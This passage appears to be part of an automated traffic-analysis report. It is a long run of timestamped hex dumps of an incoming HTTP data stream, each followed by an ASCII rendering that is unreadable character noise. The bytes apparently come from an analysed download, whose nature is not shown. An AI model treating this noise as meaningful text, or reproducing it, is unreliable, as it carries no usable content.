                                            Data Ascii: ~pE3vwVbj\)aiNL]^Bb.(6*&_d729x5wqrJ,&>.qHrP).[Zc.LZY'= W#HJ]q{v@rb0[NZ-J$%uCP02j]GAU2"vWuYG
                                            2021-11-22 13:23:12 UTC192INData Raw: ea 1d 6e 16 1f 9f ec 3f 62 dd aa fe 00 2e c2 b1 fa ee 67 dc 73 f6 78 07 ee c5 e3 bc 99 a7 e2 02 22 76 33 b5 e7 c1 16 d3 ee 5b 4a 80 3e c7 fb 4f a1 b8 e3 b1 87 4d fc 51 dc 0a cf 60 82 22 f0 49 35 ce 24 d4 38 35 cc df 40 8a 8b d0 6d 7c 16 46 24 64 a2 f9 31 d7 14 88 f9 95 84 01 67 96 0b 4a 16 b3 28 25 27 bb 06 4b 33 b6 c9 2b ea 18 c1 80 dc a8 06 fd 1e 35 48 13 4d 0e cc 0c 0c 34 32 8e 64 d3 c7 68 1e 56 99 66 8c 81 5b dc 9e c9 1d 32 30 e8 13 27 8f cd 92 14 b5 e4 20 f9 b7 0e 9d 74 41 91 ef 2c cf 67 27 c3 9b ec bb 25 75 7e fd 15 6b 87 ff 06 c6 f9 0f 88 63 2d 3b a8 18 69 9e d8 92 7c 5c c6 85 ca 77 fc 45 38 d8 b9 bd 3f fa 8a be 65 7d 43 54 39 75 50 a8 f1 db 19 0c ca d8 98 ee 7f 0b 82 d7 f9 d3 79 40 34 37 b5 3a 6f b0 43 6f e3 64 db 0c b9 d1 9b ea cb 38 61 1c 45 fa
                                            Data Ascii: n?b.gsx"v3[J>OMQ`"I5$85@m|F$d1gJ(%'K3+5HM42dhVf[20' tA,g'%u~kc-;i|\wE8?e}CT9uPy@47:oCod8aE
                                            2021-11-22 13:23:12 UTC193INData Raw: 65 e4 37 ce 4f 5f 85 c9 2a e7 5b 8a 74 b3 f7 8e 76 72 b7 9f e8 da 79 44 03 82 d5 bc 58 c5 1e 77 3f 04 9f a1 de 8b 93 72 24 40 58 ab c9 5a 89 06 56 a0 0d cb 6d 85 a6 93 19 29 17 39 86 ec ad 2f ac 19 98 da fd 72 5b 12 c2 66 97 e1 6b a2 19 13 27 03 29 6d 3a 44 1c cf a7 22 2e c1 f9 49 16 a4 20 4e ab 7d 2a 08 49 e7 7f ab 2e 56 b4 d7 46 d6 ff f6 c4 27 0c ab c0 7b 02 10 b1 2c 73 b8 92 f4 a5 5e 1f 1e dc db 10 55 54 13 31 20 13 81 f9 cf 0a ae 9d e2 10 0a 47 4b 79 44 38 d0 c8 3b 8e 24 47 47 74 42 9f d6 7d ad ea d8 cd e5 b5 69 9b 53 89 41 d2 09 2b 45 14 55 f4 8e 6a 9a b6 9c 28 ea f6 0b be 27 ed 61 a0 10 38 0a 4c f1 3d 72 14 60 ad 69 51 0a d7 0c ad 72 85 ba 27 b8 70 2d 18 be d6 88 5e 7d 31 72 95 b3 95 29 e6 ba bb 8d 73 5f e3 ae 23 36 df 8b 4e a1 db d4 5a ec cd 29 e4
                                            Data Ascii: e7O_*[tvryDXw?r$@XZVm)9/r[fk')m:D".I N}*I.VF'{,s^UT1 GKyD8;$GGtB}iSA+EUj('a8L=r`iQr'p-^}1r)s_#6NZ)
                                            2021-11-22 13:23:12 UTC194INData Raw: 57 b1 2d b8 0f a8 be 87 6d 5f 01 f8 ff 95 a0 f1 3a 4c 11 b9 bd 60 59 73 7d 47 75 40 8e 18 3b 61 0f 05 e3 68 04 07 f4 a6 73 7e 98 37 a8 93 a8 6d ad 89 52 a4 ac 09 8d 8f f2 c0 1f e3 b8 fd e2 6c d2 64 1d 79 e3 0b ec 25 79 ca 63 f3 ee 57 d8 a7 48 84 14 b8 7b aa 74 54 9e cb ab af dc ce c7 0b aa a3 84 86 a0 c0 14 6a 03 f8 2c 7b 26 10 cc ce 00 8a f3 1e e5 da 5e 62 71 a1 8c 3d 3c b3 5d 68 d8 32 a0 00 52 f6 bf ed 77 27 4d 61 07 28 e1 e7 b1 cf 71 9d a7 7a 9a 92 59 32 0d 6b a8 67 c8 51 1f b7 84 42 2a b8 5b e4 20 f0 2b 03 48 e5 c7 91 6b 29 1e a5 bd e8 f8 31 0c 55 e4 5f 03 6d c4 5f f0 44 cf df 9d 7c 0d ba 48 fc 5d fb f5 df 7b 46 fa 05 d5 3b ac 4f 64 d6 12 f8 d1 2e 4a e7 ed 33 a1 85 b8 12 c2 98 3c 0a 18 ff 25 35 48 b7 0e 6a cc d4 43 86 02 ed 31 e1 97 f1 dc 65 b2 e0 fb
                                            Data Ascii: W-m_:L`Ys}Gu@;ahs~7mRldy%ycWH{tTj,{&^bq=<]h2Rw'Ma(qzY2kgQB*[ +Hk)1U_m_D|H]{F;Od.J3<%5HjC1e
                                            2021-11-22 13:23:12 UTC195INData Raw: 15 ae 3f 9c a1 f0 03 23 73 9b b0 7e 20 98 3d cb 34 56 a0 8a 6c 1f 93 9c 6a 42 d8 30 99 b7 08 4c 31 53 92 c8 7d c1 aa 28 64 e9 9c ac c8 45 22 78 3e d2 2d 65 80 f4 d0 ce 99 e0 8d 4a 6b 5b 47 95 d5 dc 44 f5 8f 24 03 c2 4a bd c9 3c f5 0c aa bc f3 65 ce 7d 97 0c b6 25 e3 53 85 45 65 dc 4d 52 58 87 cc b0 29 ac ff 3a 02 09 77 18 5d 87 90 82 68 f2 27 0b ad 79 d1 0d 09 6b 3d 0d 16 e7 4c e4 43 d9 68 7a 05 23 c9 b4 85 14 af 55 ea 4f 06 f5 5a a3 48 52 28 72 a8 fa 45 99 46 c1 53 13 93 2c 4b 5a f7 d1 bd 54 5b 8d f9 6b 79 68 5e 81 22 f1 8f b2 fd 18 db 73 11 4c b7 03 d0 35 03 e9 a7 28 fd 52 10 d0 d9 b4 83 33 31 2e bf 4e 46 e2 cd 1a f1 91 3b 8a 51 42 16 d4 5a 1d d9 e6 a6 50 1a 91 c7 e0 45 d5 73 69 9c a4 bd 1d 9f 7e e0 1b 29 40 6c 99 48 36 c7 d0 ae b5 68 df d8 9f af bf 49
                                            Data Ascii: ?#s~ =4VljB0L1S}(dE"x>-eJk[GD$J<e}%SEeMRX):w]h'yk=LChz#UOZHR(rEFS,KZT[kyh^"sL5(R31.NF;QBZPEsi~)@lH6hI
                                            2021-11-22 13:23:12 UTC196INData Raw: 83 02 aa 14 db 2e 8f 14 7c 9e a9 fe 89 ba e6 c7 6c ff 84 e0 ac a0 a6 41 42 43 d1 2c 3a 70 39 8a 19 00 ce a5 34 a1 0d 5e 3f 27 f9 c6 20 38 cf 38 92 85 30 f2 31 21 ad c8 07 3a 40 4d 40 52 9f 87 80 b1 ee 24 24 c7 1d 9a b3 0c 89 6f 09 a8 74 9d 6d 5e d9 84 79 7e 17 1f fe 20 f5 78 ac 0e eb c7 99 25 5b 56 89 a4 f8 b6 6b 77 65 fd 6c 54 29 b9 62 f0 50 98 a7 fb 54 0d 83 1e 16 1f 62 86 d5 7d 67 93 39 b7 27 c2 42 06 fc 6d 1f d6 bd 15 cd a6 5a ab 84 eb 01 97 e7 2c 35 52 b1 71 f3 5c 57 42 dc b9 48 57 36 4e 31 46 4b 83 9d 91 0a cc c5 e0 76 55 47 25 21 46 7a 86 c8 73 d7 26 03 0a 74 0a c6 d7 3b e1 ea 92 94 e7 fd 26 9b 3d d0 40 b0 47 2b 29 4d 57 90 aa 6a ee ef 9e 4e cd f6 7f e7 26 af 44 a0 40 62 08 08 b5 3c 22 4e 61 eb 2c 50 58 8d 0e e5 08 84 cc 7d b9 12 56 19 ca 8c 8a 3a
                                            Data Ascii: .|lABC,:p94^?' 8801!:@M@R$$otm^y~ x%[VkwelT)bPTb}g9'BmZ,5Rq\WBHW6N1FKvUG%!Fzs&t;&=@G+)MWjN&D@b<"Na,PX}V:
                                            2021-11-22 13:23:12 UTC198INData Raw: bd e3 33 fc 3e b5 19 a7 16 f0 72 9f 44 50 bd 7c 4d 54 fb a3 90 25 cf ec 36 19 38 43 04 4d 84 cd e6 54 92 73 6e 8d 49 c6 2d 00 5a 65 5d 7f d4 47 d0 49 f9 65 61 57 72 c9 a9 99 09 a4 59 a8 2e 68 d1 7d f9 2c 65 4d 45 ad da 60 83 74 82 00 76 c7 24 7b 67 c6 d0 ff 07 08 ba ec 6b 6f 40 44 90 55 a8 e3 82 f7 23 e1 75 45 1f b7 38 f8 00 1f cf 9c 0c 9c 02 56 b1 e9 90 cf 60 32 02 91 6c 0e d5 aa 5f a3 d9 0f ae 07 06 7d 9f 77 44 d6 a6 f3 06 39 a6 d7 bc 19 85 08 3d aa e1 dc 1d 9f 0a f2 2f 14 6a 19 fc 07 08 c9 d3 be d9 4c 85 bc 8f 8f d1 6d f4 d7 a7 a1 fc 25 7a 59 84 53 0e de 13 0e 9d 0c be 0e d7 bf ba a3 86 4c d5 7c 65 fa 1c 57 0e 46 96 77 3b 0e 82 bb 89 1d 1c af b4 69 e4 49 95 2c 33 9e ca f9 05 2e 05 5d 5e f8 8f d8 5f 5e d2 b0 6a 26 bb 3b 7b d1 5c d0 fb 0e 6d cc 4e 8e 9e
                                            Data Ascii: 3>rDP|MT%68CMTsnI-Ze]GIeaWrY.h},eME`tv${gko@DU#uE8V`2l_}wD9=/jLm%zYSL|eWFw;iI,3.]^_^j&;{\mN
                                            2021-11-22 13:23:12 UTC199INData Raw: ae 19 48 f7 f4 5f 29 44 34 ca 4b d5 5b f8 31 cc a2 de 01 3e 6a 81 e7 f6 8f 1f 70 5c 89 5b 7a 59 b8 35 b6 5c a3 c2 ce 6b 6c 96 2c 16 1f 65 99 f2 1c 58 99 4f 82 15 d9 7a 0c ea 61 3a a3 9c 39 b8 97 67 ab a7 d6 75 8d f6 42 05 6b c3 5f ca 32 6b 59 a9 b4 64 22 26 73 31 42 76 f7 a6 8a 7f db ef 85 7e 79 04 37 15 32 4d ad ad 30 cd 47 37 27 01 3d fa d7 3c c8 9a b9 a4 84 d4 0b f2 33 e7 02 b3 6d 4e 4a 5a 36 99 96 25 e9 dc fb 4b e0 b5 77 d2 4a 88 7d d4 6a 57 66 0e 8e 4f 02 14 29 d9 02 20 48 b2 6c ff 37 f7 dd 48 d7 03 69 19 ee b3 fe 0c 3a 43 1b fa dc e6 6f e7 e0 d7 e0 00 1e e2 f1 4a 44 af c1 3c df db 82 28 b3 9c 55 96 3b 31 06 bb a7 46 e3 a1 c6 00 b5 28 c2 98 74 45 89 8d b6 0a 57 9b ea a3 da 11 79 06 d8 b0 e6 d6 47 27 88 31 30 85 6a 8c 07 81 12 a1 2c 33 30 4b cb c9 52
                                            Data Ascii: H_)D4K[1>jp\[zY5\kl,eXOza:9guBk_2kYd"&s1Bv~y72M0G7'=<3mNJZ6%KwJ}jWfO) Hl7Hi:CoJD<(U;1F(tEWyG'10j,30KR
                                            2021-11-22 13:23:12 UTC200INData Raw: c7 0d 7b 64 d5 c4 f8 07 19 b6 f2 6e 74 4f 57 f5 46 93 c9 de d7 3f d6 68 44 13 d9 2c 9d 33 25 ce aa 07 ac 08 42 b9 f5 96 bb 56 0d 1e 89 6d 06 89 ba 5f a7 cb 66 a6 05 28 72 80 79 4e f6 a5 f5 61 1a d4 eb b4 35 80 36 3d ef a6 ee 0e 88 63 d1 29 7d 52 3b db 15 08 cd 82 ef 8a 79 93 b1 b3 89 bf 4f e2 b4 85 a3 fc 05 7e 43 91 69 1b c0 39 01 99 64 8e 60 f7 a2 bd 8b 98 5f fe 76 74 9b 0d 46 1b 46 96 59 55 3c 82 a7 82 71 34 ab a4 7f fe 4d 95 30 3b f0 e0 f9 1f 0a 21 55 5a f0 9a df 63 49 bd 9f 46 24 ab 05 6a d1 54 dc f0 6b 2e ea 67 97 8c 59 a8 ee 96 29 c7 7a b5 c7 73 4f e2 30 99 27 aa 67 bc 62 70 d0 52 da a7 70 04 74 df b7 48 c5 07 c2 3c 6f fa d2 39 12 51 12 7f 4c 83 68 5f 62 48 20 37 42 b0 0f fd d1 22 20 5f 6f 9d ff 30 ce cc 55 23 76 4b db 74 2d 2e 18 d1 15 51 e2 7c 77
                                            Data Ascii: {dntOWF?hD,3%BVm_f(ryNa56=c)}R;yO~Ci9d`_vtFFYU<q4M0;!UZcIF$jTk.gY)zsO0'gbpRptH<o9QLh_bH 7B" _o0U#vKt-.Q|w
                                            2021-11-22 13:23:12 UTC202INData Raw: 7a 49 af b4 10 15 39 16 72 48 13 c7 94 c9 4f c4 9d a6 7d 0d 00 2f 79 0e 55 df 8e 59 e2 43 14 27 06 2a fe ba 7d df 8f a1 92 a5 d4 0c fe 0f fd 32 b7 7f 46 4a 53 32 80 a1 0f f8 c6 f1 46 e7 93 4b ca 54 88 7f cd 03 7c 6d 2a 83 5d 13 71 32 d9 04 35 7e ba 0e ca 37 f0 f2 62 d7 14 43 7f fa a2 f8 3b 3e 5d 6b d6 c0 ec 7a 93 cc e8 fb 01 1e 83 d8 23 70 ba da 1d df aa a3 3f b9 b8 67 90 3a 31 67 84 c2 7d e3 be da 17 cc 38 c4 8f 70 50 81 8d 9c 1a 4f b0 cf 90 da 10 6c 2f bd bb e6 c5 79 04 bd 50 05 81 73 c7 05 9d 04 91 1d 20 26 79 d2 a8 44 2d 25 5c 67 91 fa 7c 2f 2b 5c c1 68 d8 ee 43 35 63 73 6a 55 cd 85 90 d0 fb d3 03 f3 b1 e4 0c e2 17 fa d4 82 2f 35 51 15 36 c4 f8 85 75 4d 9d c8 2d e8 7a cb cc b1 28 25 77 99 b8 39 7b f6 31 fd 3f 4b b1 83 32 2d f5 bc 03 46 c7 5f b9 a1 03
                                            Data Ascii: zI9rHO}/yUYC'*}2FJS2FKT|m*]q25~7bC;>]kz#p?g:1g}8pPOl/yPs &yD-%\g|/+\hC5csjU/5Q6uM-z(%w9{1?K2-F_
                                            2021-11-22 13:23:12 UTC203INData Raw: 36 1e 63 24 ed 1d 14 c6 b4 92 b7 7b 80 b4 b4 8a f0 7a f4 a5 85 a7 f0 2e 71 72 88 59 0a c2 24 06 91 0a db 5d fd b2 b5 8f 9c 7f c2 74 65 8a 2a 5b 06 41 f8 7f 27 1f 98 bd 89 73 2f 8f b8 4f ef 4f 88 37 33 9e a7 fb 0e 2e 0c 78 49 e2 8d c8 5a 4b a6 90 40 26 ce 25 7b d7 62 f6 f2 18 0e f7 63 97 99 42 a2 d3 e2 3c cb 60 8d 94 53 41 c5 31 98 0a a1 73 df 57 7c d4 75 c7 ba 77 6a 40 a6 97 49 c2 19 98 1c 73 fa c1 50 2c 4d 4f 48 46 80 35 6f 62 48 3e 30 49 b3 4a d1 db 14 19 44 68 95 91 64 e4 ee 4c 24 63 24 d2 11 0a 05 0f d6 1a 54 cd 76 56 e8 6f 04 8a 19 6b 93 f5 81 06 11 98 ab cc 92 f7 2c d9 07 3f 98 c9 71 c9 1d 84 d9 1f 86 dd 77 bc 46 ba 0c 7b f2 a9 17 95 63 16 9e 0f 88 89 33 ac dc 0b 93 60 f1 1e f6 32 46 e9 a4 ab da b1 d0 ac 6c de d7 ee 8c d4 a5 7b 35 6f 87 6e 16 26 7a
                                            Data Ascii: 6c${z.qrY$]te*[A's/OO73.xIZK@&%{bcB<`SA1sW|uwj@IsP,MOHF5obH>0IJDhdL$c$TvVok,?qwF{c3`2Fl{5on&z
                                            2021-11-22 13:23:12 UTC204INData Raw: 04 00 7e a5 6f c0 37 f0 c8 55 b9 35 62 6d cc a4 8a 1c 36 44 28 fa dc e3 6f 95 d7 de fd 73 39 8b db 42 45 a6 e8 20 c8 b6 b7 2e be a9 46 e4 2f 31 72 b6 81 5f eb a3 c0 11 d0 19 b0 ae 70 43 9a e8 89 3c 54 82 f3 b5 cf 07 7f 42 da b9 f7 ee 62 3d 9e 63 12 93 71 ab 14 9d 02 ce 3e 24 20 47 fb c6 55 12 40 4c 65 fd e8 74 5d 4c 6a d0 43 d2 f6 4f 28 01 6f 6e 53 f6 9a 8d d0 e1 b6 27 92 90 e7 34 ca 05 eb ef f6 2c 2a 51 15 21 b0 e4 ab 6e 21 bc f2 26 9b 48 c2 ce de 15 55 51 99 bc 2c 66 fd 06 dc 29 52 a0 85 2b 68 e1 a3 6c 53 aa 1c 86 bd 0f 4a 4f 76 94 cc 2b 90 de 18 65 fe 81 ed fa 16 15 69 0f c4 17 46 8b e3 97 b9 eb c6 8d 6d 22 66 5c c5 8c b9 62 d5 9c 32 25 de 3e e9 9e 48 fe 2d 96 bf e5 33 8e 39 b9 0a a6 1e e3 53 a3 45 45 dc 56 41 4c da be f4 09 8a e5 26 00 02 64 0b 50 88
                                            Data Ascii: ~o7U5bm6D(os9BE .F/1r_pC<TBb=cq>$ GU@Let]LjCO(onS'4,*Q!n!&HUQ,f)R+hlSJOv+eiFm"f\b2%>H-39SEEVAL&dP
                                            2021-11-22 13:23:12 UTC205INData Raw: 4f fc ab 4a 2f bb 3a 7f d1 78 ca e7 19 08 f6 79 8e 82 45 be bd 85 3e da 4b 9b a9 44 4c c4 20 8e 07 aa 47 d0 4a 77 c5 6d e1 a5 7c 18 72 ab 8d 52 c9 07 b6 3d 63 e0 ea 70 2f 4b 0d 7e 4d 8b 0f 75 57 45 38 3c 4d bb 40 d9 db 05 0d 44 68 95 91 17 a1 d3 43 3e 65 2e d1 3f 1a 1e 11 d3 11 50 fa 70 54 f6 7d 76 90 0f 70 a2 b8 b2 0b 16 f5 b9 c4 a7 dd 1b c2 18 32 a7 c5 6b df 17 97 de 6d 84 db 77 8a 7a bc 16 1d d5 96 00 85 49 1e ba 11 e4 87 22 97 f3 3e 96 7b d4 08 8f 24 4c f9 af d3 c6 ae c7 ae 66 c4 f7 86 9e c5 b5 4b 05 73 e8 59 09 55 39 a9 2a 74 d4 b0 5c 86 29 2d 78 36 9c fa 35 50 c9 2f 95 da 3e c1 45 1b a5 dd 3f 16 53 23 42 6b fb 80 a4 c2 8d 21 5d d0 3f ff bb 74 dd 60 32 cd 61 b8 6d 4e fb ea 4e 40 7a 3e e1 45 dc 5f c9 3a cf c7 b9 17 2f 41 bf c0 ef 80 05 76 57 99 5f 62
                                            Data Ascii: OJ/:xyE>KDL GJwm|rR=cp/K~MuWE8<M@DhC>e.?PpT}vp2kmwzI">{$LfKsYU9*t\)-x65P/>E?S#Bk!]?t`2amNN@z>E_:/AvW_b
                                            2021-11-22 13:23:12 UTC207INData Raw: 36 9e 44 1b 94 1e b4 07 8c 2f 9b 3e 24 26 59 d8 cd 48 34 25 68 6f f3 dd 7d 46 29 57 c1 37 c2 f7 52 28 20 6c 66 44 fc b8 e4 e6 ef a0 21 f7 a9 a6 35 c4 1c ef fa 93 27 3d 3f 06 53 e8 ca af 59 4d 9d f6 31 f5 7a ae e0 c5 13 34 71 83 b4 28 7c ec 56 eb 28 4e ac 94 30 43 fe b4 6d 55 aa 07 87 b4 2a 57 7c 71 96 c3 20 87 aa 3a 72 f8 b1 cf 9b 37 15 73 2b b6 3f 49 9a d0 82 8e fc da 96 1f 45 50 47 f9 a4 a9 64 e2 8b 2e 3e ac 77 de be 52 c5 33 8c bb e9 22 fc 1a b9 1d 90 3f ed 5c 91 4c 70 d3 40 70 57 dc a2 80 40 a8 ee 27 32 24 79 1f 4a 93 a2 e5 54 e6 4b 5f 90 75 ef 07 08 6a 65 4d 16 f2 4c f1 64 f8 67 7c 70 78 bc 8e 9e 5d 84 4f b8 3a 65 db 7b e6 3c 00 0f 76 ab c6 62 b6 51 93 00 63 b3 43 5c 50 eb dc fc 16 1f ba ff 78 64 51 44 f5 51 84 fd 9f e2 25 f0 69 43 08 ce 3b e9 74 14
                                            Data Ascii: 6D/>$&YH4%ho}F)W7R( lfD!5'=?SYM1z4q(|V(N0CmU*W|q :r7s+?IEPGd.>wR3"?\Lp@pW@'2$yJTK_ujeMLdg|px]O:e{<vbQcC\PxdQDQ%iC;t
                                            2021-11-22 13:23:12 UTC208INData Raw: 1d 8f c3 48 34 61 3f d3 76 2b 10 0d d7 0d 33 e9 7c 4f c7 4f 05 90 0f 69 9f 99 aa 73 38 fd b8 ec 9e cd 0c d8 01 3a bd cb 49 fe 01 96 da 7d 8d c1 03 84 70 a6 3a 5c e2 86 00 89 54 0a af 00 e5 87 3a a1 83 07 8a 78 ce 12 ff 1a 50 9e 8b c5 f0 de f1 ab 66 c9 ef c5 96 d0 b8 14 11 78 f4 58 1c 4b 17 9c 3a 6e ff 9a 59 82 75 0d 1d 03 90 ef 1a 51 d2 3c 92 b3 16 ca 1f 14 a7 ce 35 12 62 39 44 76 ec cb 94 d8 e3 13 56 da 4b fd b3 2e d6 5d 30 dc 72 a7 3d 74 f7 f7 53 4a 76 37 e4 45 dd 40 de 31 bc 84 ac 17 3a 6a bb e0 f0 93 0e 76 46 92 7d 7a 29 ba 50 84 6a 9d c2 fa 6a 7e 90 3b 6f 5c 6d 91 f6 22 69 9d 3f b3 02 c2 5a 1a b9 44 3d b7 93 24 b9 9c 02 c4 b0 ec 44 a3 ca 4d 1f 63 c5 4f ab 33 6f 45 95 b6 75 26 21 77 5d 4c 67 fa f9 ae 6f dd c2 90 62 64 28 30 10 32 41 df bb 55 fa 79 37
                                            Data Ascii: H4a?v+3|OOis8:I}p:\T:xPfxXK:nYuQ<5b9DvVK.]0r=tSJv7E@1:jvF}z)Pjj~;o\m"i?ZD=$DMcO3oEu&!w]Lgobd(02AUy7
                                            2021-11-22 13:23:12 UTC209INData Raw: 9e 56 ad 4e 36 cb e4 5b 2d 92 d3 0d 27 aa 5e f8 58 ff 36 1a 04 fb bb 5c 96 af 7d 17 9e 6e 02 ff 45 71 1c 4d df 7c 2c ef 81 ed fa 99 b7 e3 11 2c 37 34 a6 e5 dd 18 81 6e e5 49 aa 2c e3 fd 1c a3 71 8e dc 85 53 dc 7f dd 67 d3 77 82 3e f8 2e 33 ba 27 3c 35 a4 e8 f0 40 ce 85 5a 68 67 16 78 a4 26 a7 a2 31 80 94 ce fd 16 85 49 69 1c 0b 39 0a a5 2e 83 29 82 86 c3 21 97 18 f2 6a 88 d3 a1 05 75 00 b8 1f 84 c8 dd 43 16 cc af 1e 77 d7 f6 45 12 c6 51 9e f6 9d 85 8d 63 53 da bc 0a 0f a1 e1 f0 33 c7 9d 66 47 57 95 06 21 68 37 9e 8e 73 48 a8 6f a4 dd e7 f7 c2 1b 24 a6 00 66 ed 0c 00 77 af fd 0d c6 b6 05 e8 61 07 35 fc 98 dc 8e 4b 6b 65 5c a7 8c c5 70 c1 46 50 c4 97 b5 72 fd 2a bc 4f 60 03 5c 91 71 7b aa b5 d5 d7 08 e6 da cf b3 b7 0f 91 d6 f6 b6 97 52 18 3e fe 28 ee b3 5e
                                            Data Ascii: VN6[-'^X6\}nEqM|,,74nI,qSgw>.3'<5@Zhgx&1Ii9.)!juCwEQcS3fGW!h7sHo$fwa5Kke\pFPr*O`\q{R>(^
                                            2021-11-22 13:23:12 UTC210INData Raw: b1 07 cf a7 0c a9 76 ac e0 09 2c ee 90 e7 6f 3b e8 9f dc a9 57 03 5f a1 c1 8d ac 34 66 f0 33 73 e0 1f cd 7e e9 70 c6 51 5d 46 2d b1 b5 3a 5d 2b 22 18 a4 83 13 2d 5c 39 bd 36 8d 88 13 56 7e 1c 12 2f 8f de d1 b7 94 d9 52 91 d6 09 f9 b7 f2 5b 8f 9f 4c 58 53 73 4e b5 a9 da 1b 2d e4 87 41 89 8f 23 a0 af 67 49 0e f7 c4 51 0f 84 4b b2 5b 3a db e6 57 2b 83 d0 02 3f aa 43 ed cd 7c b9 92 05 e5 a6 48 d3 a8 5c 1f 9f ee 98 ef 57 f1 8c 5e a8 78 24 ee 83 ff e0 84 a8 ff 11 24 35 30 ba fb c0 14 94 ee 41 48 b0 3b ae fa 2f a1 6b e5 d2 84 54 e0 61 de 78 df 72 83 2a e2 a1 b8 bc 3a 20 2d a7 4d 79 41 d1 8b d3 cd 60 55 64 31 f5 23 1b 30 87 06 8a bd 15 8a 4a 65 11 05 25 03 a7 a8 1c 26 9e 08 1c b2 8a dc f2 6b c4 c0 33 5d 3b 08 ad 0c 17 0c 03 43 1d ce bd 65 e5 5b e2 0c 01 ae 51 77
                                            Data Ascii: v,o;W_4f3s~pQ]F-:]+"-\96V~/R[LXSsN-A#gIQK[:W+?C|H\W^x$$50AH;/kTaxr*: -MyA`Ud1#0Je%&k3];Ce[Qw
                                            2021-11-22 13:23:12 UTC211INData Raw: 4a 05 94 b5 39 48 2f 64 16 2c f3 43 13 18 21 52 5e 2e d2 01 a1 bb 77 6d 2d 04 f4 f8 63 a2 91 ba d1 13 43 a1 16 57 6c 78 a2 71 2e 8b 04 3e 96 12 6a fe 6f 16 7f e0 c1 f1 6e 85 cf b4 fa b5 73 b0 77 51 d5 af 0d ad 73 fd aa 1c e3 a5 06 e5 15 d0 79 01 94 d7 74 ec 25 64 ec 6f 86 e9 51 db 9e 4f e2 11 b2 73 8f 74 34 9b d7 ae 94 db eb c0 23 bf 96 04 f0 a2 cf 1a 57 13 05 25 7b 28 37 c6 47 1d 8e ee 31 e9 46 5b 70 79 e4 8b 6a 24 ba df c7 d2 64 a1 2c 57 d5 b9 50 7b 0b 48 33 86 8a f8 d3 bf 90 77 36 21 46 88 54 57 94 0c 42 ad 0e ce 70 19 80 8a 27 2c 05 d9 b4 3d b5 32 a9 55 b9 d5 5c 67 46 1b d0 b6 f0 e6 4b 17 33 ee 0f 10 28 d0 35 f2 20 dd 25 94 01 03 ea 54 13 41 0f fd 85 78 37 f9 45 cf 64 a3 26 65 b9 17 42 cb fa 45 c1 e5 07 aa d2 31 04 d8 ad ae 76 00 bb 30 ab 5d 02 1f c1
                                            Data Ascii: J9H/d,C!R^.wm-cCWlxq.>jonswQsyt%doQOst4#W%{(7G1F[pyj$d,WP{H3w6!FTWBp',=2U\gFK3(5 %TAx7Ed&eBE1v0]
                                            2021-11-22 13:23:12 UTC212INData Raw: 89 88 e4 c8 f5 53 7c 5d bb 87 c3 09 30 7a 2a 56 88 0e bd a0 b6 72 44 90 5a db 43 1c 90 51 ac 54 b9 f0 f4 df c9 89 d6 09 2f bf 4d 68 d1 6c 36 11 0a f5 bb 40 fd a4 48 06 0e 5f 9d f4 4b 78 00 51 bf 7f 29 e0 8e ed ee f0 a9 ec 19 22 36 32 a8 e9 d2 04 97 eb 55 58 2d a7 8f f5 21 af 71 61 67 95 3f ee fc 7d 6f ef 72 90 bd 49 2e 30 9d 24 32 ba 08 ca d4 41 dd 09 92 65 62 16 6b 39 e9 ac 8d 36 94 01 19 78 8f 85 4a 7a 11 05 31 0b bb 21 a8 20 80 13 1c b2 8e c8 f2 6b 1d d4 33 5d e2 07 b6 0b 84 c9 99 4c 01 4d ef 02 f9 3c e2 e5 b3 c9 51 77 1b 84 a0 9e e3 1b cd f5 02 00 2f 38 ff 13 c4 9e 64 5b 4d a4 85 ed 66 b2 6b 9d 66 c0 2b e2 69 cc 72 34 51 02 f0 a9 84 34 63 f3 06 67 cb fe 42 c6 db 0f a1 62 68 3b 9e 18 3b 98 c3 9c 7c 59 bb 81 c5 65 63 f0 45 dc 80 d4 68 7b ab b8 6e 7f 07
                                            Data Ascii: S|]0z*VrDZCQT/Mhl6@H_KxQ)"62UX-!qag?}orI.0$2Aebk96xJz1! k3]LM<Qw/8d[Mfkf+ir4Q4cgBbh;;|YecEh{n
                                            2021-11-22 13:23:12 UTC214INData Raw: d0 6c 3d 84 f0 f0 d9 3a 7c f4 64 84 e9 50 c5 86 56 e2 08 a7 67 92 74 21 90 ca ad 88 c2 a1 f2 07 b7 98 9b f7 bd d3 21 44 21 85 2d 77 3b 3c c7 4f 04 96 f6 3a fa 5e 56 70 45 fe 96 63 2a 29 c4 e7 c8 f8 e4 24 40 49 25 59 61 97 0d 2f 18 91 eb de ac 88 7c 36 22 4b 86 de 47 87 15 43 b4 01 4a 2d 0e e7 8c 27 2a 0a 47 b4 3c ad 33 b1 4a bb c7 dc 60 d9 a7 d0 aa b1 e6 7a 00 20 7c 96 02 3b 5c 75 e5 27 4e 3e 9c 11 8c a4 41 0a 52 16 fa 8c 6f a8 f9 41 c0 e0 eb 26 6b ab 7c 5a 57 5e 45 c5 ee 02 ad ce bd 0f dc b7 24 62 88 fc 3e ab 5f 17 14 d2 c9 92 1a 52 16 32 2b 1d 8b f1 cd 0a a8 9e e8 14 0d 46 4c 7a 4e 38 db c9 20 80 2e 4f 5d 7c 48 99 df 73 b6 e2 dd c5 f0 b2 74 8e 4e 08 d9 d3 10 36 44 09 59 fa fd 77 85 be 83 26 9c eb 16 b6 22 ed 1e bd 0d 1f 0f 47 fa 2e e6 8d 60 bf f7 10 0a
                                            Data Ascii: l=:|dPVgt!!D!-w;<O:^VpEc*)$@I%Ya/|6"KGCJ-'*G<3J`z |;\u'N>ARoA&k|ZW^E$b>_R2+FLzN8 .O]|HstN6DYw&"G.`
                                            2021-11-22 13:23:12 UTC215INData Raw: e5 d2 18 b9 e9 52 5f be bf 17 fa 2e 20 23 ed dc 92 44 7d e4 dd 7b 4e 33 8c 31 fe 3d 3b b5 39 25 30 a8 c9 e9 45 c7 99 d2 2d 75 7f 62 2c ed a5 8a 3f 9c 1a 05 f1 18 8c 4c 7c 18 07 25 04 37 1c 8b 3a 95 1b 0b 2e 12 db 62 6f 40 c4 3c d9 69 84 a5 03 93 5a 69 4a 13 ce b3 11 f2 2f f5 74 14 cf 4d 16 0e 9a b7 0e e3 55 c2 99 18 9e 18 22 9c 16 e7 8f f4 11 68 bf 27 25 72 aa 4e 95 7c 5d b9 e7 6c ef 66 27 cd 98 f5 bc 07 68 65 f9 08 6a bb f0 02 c1 b6 1a da e3 9f 3a ff 99 69 8d af 9c 74 4e 27 1d d8 65 60 05 56 d7 80 3c 3a f4 1f ae cc cc 04 5a 8c 66 f9 a1 b6 d5 d7 18 f0 5a 6c ec b1 04 98 d0 e1 dd 8b c0 82 3f f8 32 69 92 51 7d 7f 